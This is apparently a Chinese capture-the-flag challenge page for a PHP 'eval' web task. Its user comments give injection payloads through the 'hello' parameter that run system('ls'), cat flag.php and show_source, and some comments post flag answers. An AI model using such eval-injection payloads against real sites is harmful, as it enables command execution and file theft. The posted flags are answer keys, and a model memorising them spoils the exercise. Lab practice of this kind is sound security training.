evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 13935
提  示:
描  述:
eval
评论
马踏黄河两岸 5月前

../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php

回复 0

lilifanqian 6月前

flag{4cadd25b49840f0cdb999cdabc86b103}

回复 0

18843672580 6月前

flag{21ebfdf5494104f4f54eca2bdd3cb902}

回复 0

鸡你太美 7月前

http://114.67.175.224:14089//?hello=file('flag.php') flag{1c587b72b36adc6efad7f93dce06182f}

回复 0

啵咯啵咯 7月前

/?hello=show_source("./flag.php")

回复 1

deger 7月前

读懂php发现页面会执行在hello后面的语句,并且var_dump是PHP语言中的一个函数,用于打印变量的相关信息,在url后加/?hello=file('flag.php')会将flag文件中的文件打印出来,即可得到flag

回复 2

coo1an 7月前

/?hello=(`cat%20/flag`)

回复 0

大哥大 7月前

在url后加/?hello=file('flag.php')即可得到flag

回复 2

falg 7月前

直接在url后面加?hello=var_dump(file_get_contents("flag.php"))

回复 2

栗深林兮惊层颠 7月前

flag{ef6d4343155d2fc70bd72b9bd95f6229}

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

xinkuang 攻破了该题 9小时前
yzx666 攻破了该题 12小时前
Barium 攻破了该题 13小时前
15762905283 攻破了该题 13小时前
pb9231 攻破了该题 18小时前
洁念lb 攻破了该题 23小时前
suny 攻破了该题 23小时前
1214337223 攻破了该题 1天前
Yb9msxx 攻破了该题 1天前
DJCARL 攻破了该题 1天前
wzh98 攻破了该题 1天前
Asamllcoder 攻破了该题 1天前
wzy666 攻破了该题 1天前
regal 攻破了该题 1天前
kirds 攻破了该题 1天前
1075549762 攻破了该题 1天前
Graito 攻破了该题 2天前
huanying1247 攻破了该题 2天前
redsuke 攻破了该题 2天前
941853820 攻破了该题 2天前